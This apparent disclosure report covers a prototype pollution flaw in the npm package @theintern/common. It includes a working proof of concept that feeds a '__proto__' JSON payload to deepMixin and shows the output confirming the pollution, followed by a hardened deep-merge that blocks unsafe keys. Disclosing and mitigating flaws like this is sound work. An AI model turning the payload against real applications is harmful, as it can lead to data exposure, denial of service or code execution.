@theintern/common is vulnerable to Prototype Pollution. This package allows modification of prototype behavior, which may result in Information Disclosure/DoS/RCE.
Reported the same in https://www.huntr.dev/bounties/1625553948781-theintern/intern/
🕵️♂️ Proof of Concept
1. Create the following PoC file:
// poc.js
var common = require("@theintern/common");
// JSON.parse creates an own property literally named "__proto__"
const payload = JSON.parse('{"__proto__":{"polluted":"Yes! Its Polluted"}}');
var obj = {};
console.log("Before : " + {}.polluted);
// deepMixin walks into obj.__proto__ (Object.prototype) and sets "polluted" on it
common.deepMixin(obj, payload);
console.log("After : " + {}.polluted);
Execute the following commands in another terminal:
npm i @theintern/common # Install affected module
node poc.js # Run the PoC
Check the Output:
Before : undefined
After : Yes! Its Polluted
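The mitigation a deep-merge needs to resist this payload, as an added example that is not @theintern/common's own code: the function names (safeDeepMixin, isPlainObject, replayPoc) are illustrative, and the merge refuses keys that would let the walk reach Object.prototype.

```javascript
// Added example (not code from @theintern/common): a deep-merge hardened
// against the prototype pollution shown in the PoC above.
const FORBIDDEN_KEYS = new Set(["__proto__", "constructor", "prototype"]);

function isPlainObject(value) {
  if (value === null || typeof value !== "object") return false;
  const proto = Object.getPrototypeOf(value);
  return proto === Object.prototype || proto === null;
}

// Recursively copies own enumerable properties of `source` into `target`.
// Keys that would let the walk reach Object.prototype are rejected outright,
// so untrusted JSON cannot add properties to every object in the process.
function safeDeepMixin(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) {
      throw new TypeError(`refusing to merge unsafe key "${key}"`);
    }
    const value = source[key];
    if (isPlainObject(value)) {
      // Only descend into a property `target` really owns; an inherited
      // value (e.g. toString) is replaced by a fresh object instead.
      if (!Object.prototype.hasOwnProperty.call(target, key) || !isPlainObject(target[key])) {
        target[key] = {};
      }
      safeDeepMixin(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Replays the PoC payload against the hardened merge and reports whether
// Object.prototype stayed clean. Returns { rejected, polluted }.
function replayPoc() {
  const payload = JSON.parse('{"__proto__":{"polluted":"Yes! Its Polluted"}}');
  const obj = {};
  let rejected = false;
  try {
    safeDeepMixin(obj, payload);
  } catch (err) {
    rejected = err instanceof TypeError;
  }
  return { rejected, polluted: ({}).polluted !== undefined };
}

console.log(replayPoc()); // { rejected: true, polluted: false }
```

Nested variants such as `{"a":{"__proto__":{...}}}` or `{"constructor":{"prototype":{...}}}` hit the same check during recursion.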